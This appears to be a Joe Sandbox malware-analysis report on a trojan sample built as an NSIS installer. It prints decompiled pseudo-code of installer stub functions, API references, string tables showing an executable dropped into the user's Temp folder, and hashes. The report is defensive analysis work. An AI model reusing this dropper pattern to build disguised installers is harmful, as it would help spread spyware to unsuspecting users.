							if(_t38 ==  *0x7a8ac4) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a6c - _t136;
							if( *0x7a7a6c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045CA(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045CA(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8b2c - _t136;
							_v28 = _t48;
							if( *0x7a8b2c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045EC(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79ff50, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x7a8b2c - _t136;
							if( *0x7a8b2c == _t136) {
								_push( *0x7a1f84);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x79ff50);
							}
							E004045FF();
							E0040666E(0x7a1f88, E004040AC());
							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f88);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x7a7a78);
									 *0x7a0f60 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x7a7a78 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045CA(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x7a7a6c - _t136;
									if( *0x7a7a6c != _t136) {
										goto L63;
									}
									ShowWindow( *0x7a7a78, 8);
									E00404616(0x405);
									goto L60;
								}
								__eflags =  *0x7a8b2c - _t136;
								if( *0x7a8b2c != _t136) {
									goto L63;
								}
								__eflags =  *0x7a8b20 - _t136;
								if( *0x7a8b20 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7a7a78); // executed
						 *0x7a8aa8 = _t136;
						EndDialog(_t127,  *0x7a0758); // executed
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
						__eflags =  *0x7a7a6c;
						return 0 |  *0x7a7a6c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x7a8b2c - _t136;
											if( *0x7a8b2c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x7a0758 = 1;
												L23:
												_push(0x78);
												L24:
												E004045A3();
												goto L28;
											}
											E0040140B(_t129);
											 *0x7a0758 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x7a7a78);
						 *0x7a7a78 = _t122;
						L60:
						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x7a3f88 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404631(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x004040d6
0x004040dd
0x00404244
0x00404248
0x0040424c
0x0040424e
0x00404253
0x0040425e
0x00404269
0x0040426e
0x00404270
0x00404272
0x00404275
0x0040427a
0x00404288
0x00404295
0x0040429c
0x0040429c
0x0040429d
0x0040429d
0x004042a2
0x004042a8
0x004042af
0x004042b5
0x004042b7
0x004042f7
0x004042fc
0x00404301
0x00404301
0x00404306
0x0040430f
0x00404311
0x00404316
0x0040431c
0x00404320
0x00404320
0x00404325
0x0040432b
0x00000000
0x00000000
0x00404336
0x0040433c
0x00000000
0x00000000
0x00404345
0x0040434d
0x00404352
0x00404355
0x0040435b
0x00404360
0x00404363
0x00404369
0x0040436e
0x00404371
0x00404377
0x0040437f
0x00404385
0x0040438b
0x0040438f
0x00404396
0x00404396
0x00404396
0x004043a0
0x004043b2
0x004043be
0x004043c3
0x004043cd
0x004043d3
0x004043d5
0x004043da
0x004043d7
0x004043d7
0x004043d7
0x004043ea
0x00404402
0x00404404
0x0040440a
0x0040441f
0x0040440c
0x00404415
0x00404417
0x00404417
0x00404425
0x00404436
0x0040444c
0x00404453
0x00404459
0x0040445d
0x00404462
0x00404464
0x00000000
0x0040446a
0x0040446a
0x0040446c
0x00000000
0x00000000
0x00404472
0x00404476
0x0040449b
0x004044a1
0x004044a7
0x004044a9
0x00000000
0x00000000
0x004044cf
0x004044d5
0x004044d7
0x004044dc
0x00000000
0x00000000
0x004044e2
0x004044e5
0x004044e8
0x004044ff
0x0040450b
0x00404524
0x0040452a
0x0040452e
0x00404533
0x00404539
0x00000000
0x00000000
0x00404543
0x0040454e
0x00000000
0x0040454e
0x00404478
0x0040447e
0x00000000
0x00000000
0x00404484
0x0040448a
0x00000000
0x00000000
0x00000000
0x00404490
0x00404464
0x0040455b
0x00404567
0x0040456e
0x00000000
0x004042b9
0x004042b9
0x004042bc
0x004042ef
0x004042ef
0x004042f1
0x00000000
0x00000000
0x00000000
0x004042f1
0x004042be
0x004042c2
0x004042c7
0x004042c9
0x00000000
0x00000000
0x004042d9
0x004042e1
0x00000000
0x004042e7
0x004040ef
0x004040ef
0x004040f3
0x004040f8
0x00404107
0x00404107
0x0040410d
0x00404114
0x00404158
0x0040415e
0x00404177
0x0040417a
0x0040418d
0x00404193
0x00000000
0x00000000
0x00404199
0x004041a4
0x004041a6
0x004041a8
0x004041c7
0x004041c7
0x004041ca
0x004041cf
0x004041d2
0x004041e2
0x004041e3
0x004041e5
0x0040421b
0x0040422b
0x00000000
0x0040422b
0x004041e7
0x004041ed
0x00404206
0x0040420b
0x0040420d
0x00000000
0x00000000
0x0040420f
0x004041fb
0x004041fb
0x004041fd
0x004041fd
0x00000000
0x004041fd
0x004041f0
0x004041f5
0x00000000
0x004041f5
0x004041d4
0x004041da
0x00000000
0x00000000
0x004041dc
0x00000000
0x004041dc
0x004041cc
0x00000000
0x004041cc
0x004041b2
0x004041b9
0x004041bf
0x004041c1
0x00404597
0x00000000
0x00404597
0x00000000
0x004041c1
0x0040417f
0x00000000
0x00404187
0x00404166
0x0040416c
0x00404574
0x0040457a
0x00404587
0x0040458d
0x0040458d
0x00000000
0x00404116
0x0040411b
0x00404127
0x00404130
0x00404231
0x00000000
0x0040414f
0x00404152
0x00000000
0x00404152
0x00404130
0x00404114

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
ShowWindow.USER32(?), ref: 00404127
GetWindowLongW.USER32(?,000000F0), ref: 00404139
ShowWindow.USER32(?,00000004), ref: 00404152
DestroyWindow.USER32 ref: 00404166
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040417F
GetDlgItem.USER32 ref: 0040419E
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
IsWindowEnabled.USER32(00000000), ref: 004041B9
GetDlgItem.USER32 ref: 00404264
GetDlgItem.USER32 ref: 0040426E
KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404288
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
GetDlgItem.USER32 ref: 0040437F
ShowWindow.USER32(00000000,?), ref: 004043A0
EnableWindow.USER32(?,?), ref: 004043B2
EnableWindow.USER32(?,?), ref: 004043CD
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043E3
EnableMenuItem.USER32 ref: 004043EA
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
SetWindowTextW.USER32(?,007A1F88), ref: 00404453
ShowWindow.USER32(?,0000000A), ref: 00404587

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 2475350683-0
Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403D1D Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403D1D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8ab0;
				_t22 = E00406A3B(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f88;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
					__eflags =  *0x7a1f88;
					if(__eflags == 0) {
						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004065B5(L"1033", _t73 & 0x0000ffff);
				}
				E00403FF3(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
				 *0x7a8b3c = 0x10000;
				if(E00406045(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00406045(_t98, _t86) == 0) {
						E004066AB(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a7a88 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FF3(_t78, __eflags);
							__eflags =  *0x7a8b40;
							if( *0x7a8b40 != 0) {
								_t33 = E004057A3(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a6c;
								if( *0x7a7a6c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f68, 5); // executed
							_t39 = E004069CB("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069CB("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
								 *0x7a7a64 = _t87;
								RegisterClassW(0x7a7a40);
							}
							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
							E00403C6D(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8aa0;
						 *0x7a7a44 = E00401000;
						 *0x7a7a50 =  *0x7a8aa0;
						 *0x7a7a54 = _t30;
						 *0x7a7a64 = 0x40a3b4;
						if(RegisterClassW(0x7a7a40) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a40;
					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
					_t63 =  *0x7a6a40; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a42;
						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040666E(_t86, E00405F3D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F89(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403d23
0x00403d2c
0x00403d33
0x00403d35
0x00403d49
0x00403d5b
0x00403d64
0x00403d6d
0x00403d74
0x00403d79
0x00403d80
0x00403d93
0x00403d93
0x00403d9e
0x00403d37
0x00403d37
0x00403d42
0x00403d42
0x00403da3
0x00403dad
0x00403db6
0x00403dbb
0x00403dcc
0x00403e5e
0x00403e66
0x00403e6f
0x00403e6f
0x00403e85
0x00403e8b
0x00403e99
0x00403f1a
0x00403f22
0x00403f2c
0x00403f31
0x00403f37
0x00403fc1
0x00403fc6
0x00403fc8
0x00403fe4
0x00000000
0x00403fe4
0x00403fca
0x00403fd0
0x00403fd8
0x00403fd8
0x00000000
0x00403fd0
0x00403f45
0x00403f50
0x00403f55
0x00403f57
0x00403f5e
0x00403f5e
0x00403f69
0x00403f71
0x00403f73
0x00403f75
0x00403f7e
0x00403f81
0x00403f87
0x00403f87
0x00403fa6
0x00403fb7
0x00000000
0x00403fbc
0x00403f24
0x00403f26
0x00000000
0x00403e9b
0x00403e9b
0x00403ea7
0x00403eb1
0x00403eb7
0x00403ebc
0x00403ecb
0x00403fe9
0x00403fe9
0x00000000
0x00403fe9
0x00403eda
0x00403f15
0x00000000
0x00403f15
0x00403dd2
0x00403dd2
0x00403dd5
0x00403dd7
0x00000000
0x00000000
0x00403de5
0x00403df7
0x00403dfc
0x00403e05
0x00000000
0x00000000
0x00403e0b
0x00403e0d
0x00403e1a
0x00403e1a
0x00403e23
0x00403e29
0x00403e51
0x00403e59
0x00000000
0x00403e3b
0x00403e3c
0x00403e45
0x00403e4b
0x00403e4c
0x00000000
0x00403e4c
0x00403e47
0x00403e49
0x00000000
0x00000000
0x00000000
0x00403e49
0x00403e29

APIs

Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68

GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D37

Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2

lstrcatW.KERNEL32(1033,007A1F88), ref: 00403D9E
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,?,?,?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,76CDFAA0), ref: 00403E1E
lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,?,?,?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,?,00000000,?), ref: 00403E3C
LoadImageW.USER32 ref: 00403E85
RegisterClassW.USER32 ref: 00403EC2
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403EDA
CreateWindowExW.USER32 ref: 00403F0F
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F45
GetClassInfoW.USER32 ref: 00403F71
GetClassInfoW.USER32 ref: 00403F7E
RegisterClassW.USER32 ref: 00403F87
DialogBoxParamW.USER32 ref: 00403FA6

Strings

RichEdit20W, xrefs: 00403F69, 00403F6F
.exe, xrefs: 00403E2B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D22
RichEdit, xrefs: 00403F78
C:\Users\user\AppData\Local\Temp, xrefs: 00403DAD, 00403DB5, 00403E58, 00403E5E, 00403E6E
.DEFAULT\Control Panel\International, xrefs: 00403D89
RichEd32, xrefs: 00403F59
RichEd20, xrefs: 00403F4B
@zz, xrefs: 00403E94
_Nb, xrefs: 00403EA1, 00403F09
C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl, xrefs: 00403DE5, 00403DEE, 00403DFC, 00403E4B, 00403E51
1033, xrefs: 00403D3D, 00403D99
Control Panel\Desktop\ResourceLocale, xrefs: 00403D51

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-3242864759
Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 202
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E004030D0(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t61;
				intOrPtr _t64;
				void* _t67;
				intOrPtr* _t69;
				long _t81;
				signed int _t88;
				intOrPtr _t91;
				void* _t94;
				void* _t99;
				void* _t103;
				long _t104;
				long _t107;
				void* _t108;

				_v8 = 0;
				_v12 = 0;
				 *0x7a8aac = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe", 0x400);
				_t103 = E0040615E(L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe", 0x80000000, 3);
				 *0x40a018 = _t103;
				if(_t103 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040666E(L"C:\\Users\\jones\\Desktop", L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe");
				E0040666E(0x7b7000, E00405F89(L"C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t103, 0);
				 *0x79f740 = _t54;
				_t107 = _t54;
				if(_t54 <= 0) {
					L22:
					E0040302E(1);
					_pop(_t94);
					if( *0x7a8ab4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t108 = _t57;
						 *0x40ce78 = 0xb;
						 *0x40ce90 = 0; // executed
						E0040618D(_t94,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t61;
						if(_t61 != 0xffffffff) {
							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
							 *0x79f744 = _t64;
							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
							if(_t67 == _v20) {
								 *0x7a8ab0 = _t108;
								 *0x7a8ab8 =  *_t108;
								if((_v40 & 0x00000001) != 0) {
									 *0x7a8abc =  *0x7a8abc + 1;
								}
								_t45 = _t108 + 0x44; // 0x44
								_t69 = _t45;
								_t99 = 8;
								do {
									_t69 = _t69 - 8;
									 *_t69 =  *_t69 + _t108;
									_t99 = _t99 - 1;
								} while (_t99 != 0);
								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
								E00406119(0x7a8ac0, _t108 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035FE( *0x79f730);
					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t104 = _t107;
						asm("sbb eax, eax");
						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
						if(_t107 >= _t81) {
							_t104 = _t81;
						}
						if(E004035E8(0x797730, _t104) == 0) {
							E0040302E(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a8ab4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L19;
						}
						E00406119( &_v40, 0x797730, 0x1c);
						_t88 = _v40;
						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t88;
							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
							_t91 = _v16;
							 *0x7a8ab4 =  *0x79f730;
							if(_t91 > _t107) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t107 = _t91 - 4;
								if(_t104 > _t107) {
									_t104 = _t107;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t107 <  *0x79f740) {
							_v8 = E00406B28(_v8, 0x797730, _t104);
						}
						 *0x79f730 =  *0x79f730 + _t104;
						_t107 = _t107 - _t104;
					} while (_t107 != 0);
					goto L22;
				}
			}

0x004030de
0x004030e1
0x004030fb
0x00403100
0x00403113
0x00403118
0x0040311e
0x00000000
0x00403120
0x00403131
0x00403142
0x00403149
0x00403151
0x00403156
0x00403158
0x00403246
0x00403248
0x00403253
0x00403254
0x00000000
0x00000000
0x0040325d
0x00403289
0x0040328e
0x00403294
0x004032a2
0x004032a9
0x004032af
0x004032ca
0x004032d3
0x004032d8
0x004032f7
0x00403307
0x00403319
0x0040331e
0x00403326
0x00403333
0x0040333b
0x00403340
0x00403342
0x00403342
0x0040334a
0x0040334a
0x0040334d
0x0040334e
0x0040334e
0x00403351
0x00403353
0x00403353
0x0040335d
0x00403369
0x00000000
0x0040336e
0x00000000
0x00403326
0x00000000
0x004032da
